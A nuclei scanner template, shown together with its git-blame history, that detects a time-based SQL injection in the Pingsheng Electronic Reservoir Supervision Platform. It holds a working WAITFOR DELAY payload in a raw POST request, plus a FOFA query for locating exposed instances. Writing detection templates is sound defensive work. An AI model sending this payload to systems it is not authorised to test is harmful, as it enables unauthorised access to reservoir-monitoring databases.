nuclei-templates/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml

id: pingsheng-electronic-sqli

info:
  name: Pingsheng Electronic Reservoir Supervision Platform - Sql Injection
  author: securityforeveryone
  severity: high
  description: |
    There is a SQL injection vulnerability in the GetAllRechargeRecordsBySIMCardId interface of Pingsheng Electronics Reservoir Supervision Platform. An attacker can access the data in the database without authorization, thereby stealing user data and leaking user information.
  reference:
    - https://github.com/wy876/POC/blob/main/%E5%B9%B3%E5%8D%87%E7%94%B5%E5%AD%90%E6%B0%B4%E5%BA%93%E7%9B%91%E7%AE%A1%E5%B9%B3%E5%8F%B0GetAllRechargeRecordsBySIMCardId%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
    - https://github.com/zan8in/pxplan/blob/main/goby_pocs/10-13-crack/redteam_20230316121609/CVD-2022-5560.go
  metadata:
    verified: "true"
    max-request: 1
    fofa-query: "js/PSExtend.js"
  tags: sqli,pingsheng

http:
  - raw:
      - |
        @timeout 20s
        POST /WebServices/SIMMaintainService.asmx/GetAllRechargeRecordsBySIMCardId HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        loginIdentifer=&simcardId=';WAITFOR DELAY '0:0:6'--

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains_all(body,"Result","false","Message")'
          - 'contains(content_type,"text/xml")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450220496311996edc771bcc56eb44c74ed2d48fe8a4d19fbe73b626b9ec4807aaa6e5022100ee7b686afbd156f43d0e1f827405e71e15f4a33638379d8d119fe06955e236b1:922c64590222798bb761d5b6d8e72950
add pingsheng sqli 2024-07-08 23:11:54 +00:00			`id: pingsheng-electronic-sqli`

			`info:`
			`name: Pingsheng Electronic Reservoir Supervision Platform - Sql Injection`
			`author: securityforeveryone`
update severity 2024-07-09 10:24:07 +00:00			`severity: high`
add pingsheng sqli 2024-07-08 23:11:54 +00:00			`description: \|`
minor update 2024-07-09 10:19:53 +00:00			`There is a SQL injection vulnerability in the GetAllRechargeRecordsBySIMCardId interface of Pingsheng Electronics Reservoir Supervision Platform. An attacker can access the data in the database without authorization, thereby stealing user data and leaking user information.`
add pingsheng sqli 2024-07-08 23:11:54 +00:00			`reference:`
			`- https://github.com/wy876/POC/blob/main/%E5%B9%B3%E5%8D%87%E7%94%B5%E5%AD%90%E6%B0%B4%E5%BA%93%E7%9B%91%E7%AE%A1%E5%B9%B3%E5%8F%B0GetAllRechargeRecordsBySIMCardId%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md`
minor update 2024-07-09 10:19:53 +00:00			`- https://github.com/zan8in/pxplan/blob/main/goby_pocs/10-13-crack/redteam_20230316121609/CVD-2022-5560.go`
add pingsheng sqli 2024-07-08 23:11:54 +00:00			`metadata:`
minor update 2024-07-09 10:19:53 +00:00			`verified: "true"`
add pingsheng sqli 2024-07-08 23:11:54 +00:00			`max-request: 1`
			`fofa-query: "js/PSExtend.js"`
			`tags: sqli,pingsheng`

			`http:`
			`- raw:`
			`- \|`
			`@timeout 20s`
			`POST /WebServices/SIMMaintainService.asmx/GetAllRechargeRecordsBySIMCardId HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`loginIdentifer=&simcardId=';WAITFOR DELAY '0:0:6'--`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'duration>=6'`
minor update 2024-07-09 10:19:53 +00:00			`- 'contains_all(body,"Result","false","Message")'`
			`- 'contains(content_type,"text/xml")'`
add pingsheng sqli 2024-07-08 23:11:54 +00:00			`- 'status_code == 200'`
			`condition: and`
Auto Template Signing [Wed Jul 10 06:10:27 UTC 2024] :robot: 2024-07-10 06:10:27 +00:00			`# digest: 4a0a004730450220496311996edc771bcc56eb44c74ed2d48fe8a4d19fbe73b626b9ec4807aaa6e5022100ee7b686afbd156f43d0e1f827405e71e15f4a33638379d8d119fe06955e236b1:922c64590222798bb761d5b6d8e72950`